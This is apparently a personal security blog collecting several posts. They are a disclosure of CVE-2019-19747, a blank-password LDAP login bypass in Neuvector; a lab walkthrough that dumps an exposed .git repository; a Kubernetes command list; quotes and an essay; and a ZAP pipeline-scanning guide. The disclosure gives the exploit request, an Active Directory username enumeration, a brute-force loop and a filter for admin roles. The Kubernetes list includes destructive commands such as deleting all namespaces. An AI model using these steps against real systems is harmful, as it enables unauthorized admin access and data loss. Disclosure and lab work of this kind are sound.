CVE-2019-19747

Summary

On 11 December 2019 I discovered that Neuvector 3.1 and below allowed authentication as a valid AD LDAP user using a blank password (there is client-side browser validation, so send the request to the endpoint directly or disable the JS validation functions). Additionally, the user role is returned in the response body by Neuvector, making it possible to search for a user who has an “admin” role and thus gain admin access to the Neuvector console.

Background

The Lightweight Directory Access Protocol (LDAP) allows for quick data lookups from an LDAP backend server. In order to retrieve information from the LDAP backend server, an LDAP client needs to establish a session with the server. There are different types of sessions, but they are all formed through a bind request to the server.

I’m not an expert on LDAP, but there appear to be three general types of sessions supported.

  • An anonymous session – established through an anonymous bind where BOTH the password and the username MUST be blank.
  • An authenticated session – using a simple bind where BOTH the password and the username fields must NOT be blank.

And finally, the one where things get more interesting:

  • An unauthenticated simple bind session where one needs to only pass a valid username WITHOUT a password.

The Vulnerability

Section 5.1.2 of the LDAP RFC (RFC 4513) covers unauthenticated simple binds, and it provides insight into the vulnerability in Neuvector: a bind request with a non-empty name but a zero-length password succeeds, yet results in an anonymous authorization state.

What this means for security is that some LDAP clients may misinterpret the LDAP server response. If a user performs a successful unauthenticated simple bind, a session has been created, so the LDAP client may assume the user is an authenticated user and NOT an anonymous one. This means anyone with a valid LDAP username can authenticate and gain access to the application without that user’s password 🤦‍♂️. Furthermore, for companies using MS Active Directory prior to Server 2019 (likely the majority) it is not possible to prevent the vulnerability server side, as one cannot alter this config on the domain controllers (the option does not exist!). For most Windows environments it is therefore up to the LDAP client to enforce validation of the user input (disallowing empty passwords).

CVE-2019-19747

Neuvector allows for authentication through OpenLDAP or Microsoft Active Directory. When using MS AD (the only configuration I tested), Neuvector fails to disallow an empty password string and is thus vulnerable to what we discussed above. The following request provides the user with a valid token:

POST /auth HTTP/1.1
Host: neuvector.some.domain
Connection: close
Content-Length: 35
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/json;charset=UTF-8

{"username":"bobalice","password":""}

Exploitation

Get a list of all active directory usernames:

Get-ADUser -Filter {Enabled -eq "true"} | Select-Object SamAccountName

Using the list of usernames, brute-force the endpoint and look for valid status codes to discover valid users:
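
A minimal sketch of that brute-force step, assuming the usernames were exported to a file and using the Neuvector host from the request above. The curl line is commented out so nothing is sent when the sketch is run as-is; the `resp_<user>.json` naming is my own convention, not from the product:

```shell
TARGET="https://neuvector.some.domain/auth"      # hypothetical endpoint from the request above
printf '%s\n' bobalice alicebob > usernames.txt   # stand-in for the Get-ADUser export

while IFS= read -r user; do
  # Build the blank-password auth payload for each candidate username
  payload=$(printf '{"username":"%s","password":""}' "$user")
  echo "$payload"
  # Uncomment to actually send the request and save each response:
  # curl -sk -o "resp_${user}.json" -w "${user}: %{http_code}\n" \
  #   -H 'Content-Type: application/json;charset=UTF-8' \
  #   -d "$payload" "$TARGET"
done < usernames.txt
```

Valid usernames return a 200 with a token in the body; invalid ones fail, so the status code alone separates real accounts from guesses.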

Use your favourite string manipulation tool, or the response Length field, to look for the admin role in the response body:

{"token":{"server":"abc123","email":"","role":"admin","username":"bobalice","default_password":false,"locale":"en","fullname":"abc123:bobalice","token":"abc"
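
As a concrete example of that filtering step, a grep over saved responses flags the accounts that came back with the admin role. The `resp_*.json` filenames are an assumption, and the sample responses below are fabricated so the sketch is self-contained:

```shell
# Fake two saved auth responses so the filter has something to match;
# in practice these files would come from the brute-force loop.
echo '{"token":{"server":"abc123","role":"admin","username":"bobalice"}}' > resp_bobalice.json
echo '{"token":{"server":"abc123","role":"reader","username":"alicebob"}}' > resp_alicebob.json

# List only the responses that contain an admin role
grep -l '"role":"admin"' resp_*.json
```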

Because Neuvector provides insight into the vulnerabilities in your container estate, this is gold for attackers wanting to pivot or maintain access: it essentially paints a roadmap of the go-to areas for compromise.

Neuvector has released patch 3.1.1, which fixes the vulnerability: https://docs.neuvector.com:8334/releasenotes/3x

Comments

Neuvector is a security solution, and a good one in my opinion, so this is obviously not ideal. But before we crucify them: they are made up of humans and succumb to mistakes like the rest of us. Let this be a good reminder that these mistakes are more common than we think, that none of us are immune, and that we should not become complacent.

I commend Neuvector for their quick turnaround in fixing the vulnerability, and I am still a big fan of their solution for Kubernetes. With that being said, I do have one criticism.

They did seem to downplay the vulnerability slightly and, to my knowledge, have not sent out an advisory to their clients to upgrade (I am a client and did not receive notice; this makes me sad, as I would like to know as soon as possible when a severe vulnerability is discovered in a security product I use). I also got the impression that they thought it had more to do with an AD/server-side misconfiguration, and I repeatedly explained that before Windows Server 2019 it was not possible to make the change server side.

As it stands, there are probably Microsoft clients using Neuvector who cannot make the change server side and will remain vulnerable until they upgrade to 3.1.1+. Overall I am still a fan of Neuvector and will continue using them, and I hope in future they will develop a security advisory section along with a method of rewarding security researchers for reported vulnerabilities.

Activity History

Vulnerability discovered and disclosed to the vendor Neuvector on the 11th of December 2019

Neuvector issued a patch with the fix on the 17th of December 2019

Publicly disclosed 20th December 2019

Updates

Neuvector ended up sending out comms to clients on the 26th of December. In the comms they once again blamed the server side: “This release fixes a potentially critical vulnerability that arises if an LDAP/AD server is misconfigured to allow unauthenticated (blank password) logins.”

Attack Defense – DevSecOps

Continuing with the DevOps theme. Today I will be trying out some of the DevSecOps labs that are offered by https://www.attackdefense.com. Follow the blue dots.

Target Discovery

A basic nmap scan of the 192.xxx.xxx.2-10 range to identify our target:

nmap 192.xxx.xxx.2-10

Target IP: 192.xxx.xxx.3

.GIT

Now that we know our target IP, let’s look at the lab objectives:

As the port scan shows, port 80 is open on our target, so let’s focus there. As usual, the first step is to look for discoverable content. Let’s use DIRB and see if there is any low-hanging fruit that could contain a password.

dirb http://192.xxx.xxx.3

Bingo! “.git” – that’s our focus.

Head over to https://github.com/internetwache/GitTools and clone it locally. This is the toolkit we are going to use to complete the rest of the lab. The idea is to first dump the git repo to our local machine, extract it and look for a password (hopefully left in the repo).

Dumping

./gitdumper.sh 192.125.70.3/.git/ dump

Extracting

./extractor.sh /root/tools/GitTools/Dumper/dump/ extract

Config.php

We have extracted our dump taken from the web server on port 80. It’s time to look for potentially sensitive files.
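
One quick way to do that hunt is a recursive, case-insensitive grep across the extracted tree. The `extract/` path matches the extractor command above, but the sample file below is fabricated so the sketch is self-contained:

```shell
# Stand-in for the extracted repo; in the lab you would point the grep
# at the real extract/ directory produced by extractor.sh.
mkdir -p extract/demo
printf '<?php $db_pass = "s3cret"; ?>\n' > extract/demo/config.php

# Recursively list files mentioning likely credential keywords
grep -ril 'pass' extract/
```

Swapping in other keywords (secret, token, key) widens the net when nothing obvious turns up.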

Config.php – Bingo!

Done

One Liners and Quotes I love

From time to time I’ll stumble upon a sequence of words that resonate with me, this is a list of some of them…

True honesty is only possible when it is unconditional. The truth is only the truth when it is given as a gift. Speak the truth not based on the outcome. What’s important is you expressing the truth, not the result.

Know what you want, so you can recognise it when it’s in front of you.

The virtuous worry about their integrity, lesser humans about their reputation.

Remembering you are going to die is the best way I know to avoid the trap of thinking you have something to lose. There’s no reason not to follow your heart.

Everyone wants the truth but there are very few who are willing to give it.

The world is full of lonely people waiting for other people to make the first move.

At the touch of love everyone becomes a poet. – Plato

It takes a long time to grow an old friend

It is the mark of an educated mind to be able to entertain a thought without accepting it.
– Aristotle

Kubernetes – List of Frequently Used Commands

— This is a living post — New commands will be added as I discover any of use —

Basics

#get information about namespace
kubectl describe namespaces <namespace>
#get information about a pod
kubectl describe pods <podname> -n <namespace>
#delete pod in specific namespace
kubectl delete pods -n <namespace> <pod_name>
#logs for specific pod
kubectl logs <podname>
#cordon off node
kubectl cordon <nodename>
#list Services
kubectl get services
#delete all namespaces
kubectl delete --all namespaces

Useful

#count number of returned pods
kubectl get pods -n <namespace> --no-headers | wc -l
#change lifetime of namespace
kubectl annotate namespaces <namespace> lifetime-minutes=400 --overwrite
#find pods running on same node and output in wide format
kubectl get pods --all-namespaces --field-selector spec.nodeName=<nodename> -o wide
#logs for specific container on pod
kubectl logs <podname> -c <containername>
#watch nodes 
kubectl get nodes -w
#execute shell in container on pod
kubectl exec -it <podname> -- bash
#List nodes with their labels
kubectl get nodes --show-labels
#FORCE delete when pods are stuck in TERMINATING
kubectl delete pods --grace-period=0 --force --all --namespace <namespace>
#Get all pods in all namespaces
kubectl get pods --all-namespaces --output=wide

Utility

#scale all deployments in a namespace to zero
kubectl scale --replicas=0 deployment $(kubectl get deployments -n <namespace> --no-headers | awk '{ print $1 }') -n <namespace>
#drain node
kubectl drain <nodename> --force --ignore-daemonsets --delete-local-data
#show usage for node
kubectl top node <nodename>
#Show usage for pod
kubectl top pod <podname>
#follow logs
kubectl logs <pod-name> -n <namespace> -f
#View running container environment variables
kubectl exec -it -n <ci-namespace> <runner-pod> -- env | grep <CI_BUILD>

Perspective, Change and Awareness

Take a second and think of a time when your worldview differed from your current worldview. Now think about five years before then and, for the older folk, even five years before that.

Notice something? It’s a cycle of changing perspective, mostly due to fluctuating levels of awareness. If you’re like me you’ll notice something else: your old worldview seems outdated now, and you may even find it laughable how little awareness you had back then. Perhaps one day I’ll approach this very post with the same mindset, repeating the exact process I have just described, and I’ll laugh at how little I knew and how naive my perspective was.

It seems as though this pattern repeats itself over and over again. You gain more awareness, which modifies your perspective, leading you to assume your old worldview was wrong and your new one is correct. The caveat is that although one’s worldview may be somewhat broader than before, it is still limited. Not to mention the obvious bias you’ll have towards your current perspective.

Change in perspective is normal and gaining greater awareness is admirable, but I can assure you that a revelation or new-found awareness is not the ultimate wisdom in the universe. The key takeaway here is to always be aware of the limitations a perspective has – all of them.

 

DevSecOps – Integrating Vulnerability Scanning Within the CI/CD Pipeline Part 1

Recently I made a slight career change, a shift into DevSecOps as opposed to pure security – I’m excited and loving it so far. My first task: integrate security scanning within the pipeline. Disclaimer: this article is very beginner friendly.

Our tech stack supporting CI/CD consists of Kubernetes, Docker and Gitlab. I didn’t find much on getting automated security scanning going with Gitlab, so I basically started from scratch.

Picking a tool

Coming from a pentesting background, I’m comfortable with OWASP ZAP as well as Burp Suite. Burp Suite has recently released an enterprise edition that touts CI integration, but my gut told me it would be easier with ZAP, as there may be more support online if (turned into when) I ran into difficulties. The first thing to do was find a Docker container with ZAP installed. This did the trick.

Getting Started

I found a container online, but I had no idea how Gitlab worked. I knew Gitlab was what we used for our entire SDLC, but I was not sure exactly how the CI/CD integration worked. It turns out it works as follows:

Once you have committed your code, it is compiled and a build is created. That build is run by Gitlab, which carries out a specific set of jobs that you define in a YAML file – basically a configuration file telling the Gitlab runners (which carry out the jobs) what to do. In our case it needs to tell the runners to kick off an automated scan. Remember, the idea is to run a scan every time a developer commits a piece of code. If the scan picks up any HIGH severity vulnerabilities, the build should fail.

Configuring ZAP

ZAP needs to be able to kick off a scan automatically and fail the build if a High or Critical vuln is discovered. The following does the job:

 

#!/bin/bash
zap-cli --verbose quick-scan -sc --start-options '-config api.disablekey=true' \
  https://xxxx.xxxx.xxx.xxx \
  -l Informational | tee scan_result.txt

# Get results: count High/Critical findings
alerts=$(grep -cE 'High|Critical' scan_result.txt)
echo $alerts

if [ "$alerts" -gt 0 ]; then
  echo "$alerts findings. Build failing"
  exit 1
else
  echo "success - no findings identified"
  exit 0
fi

Save this as a shell script in your repo. In my case I am using Gitlab, so the next step is to tell the Gitlab runner what to do by creating a Gitlab CI YAML file. The below does the trick.

image: docker-registry.public-xxxxx.xxxxx.xxxxx/owasp/zap2docker-weekly

stages:
  - zap
 
Scan:
  stage: zap
  tags: [ kubernetes-deploy ]
  script:
    - ./quick-scan-zap.sh

Boom!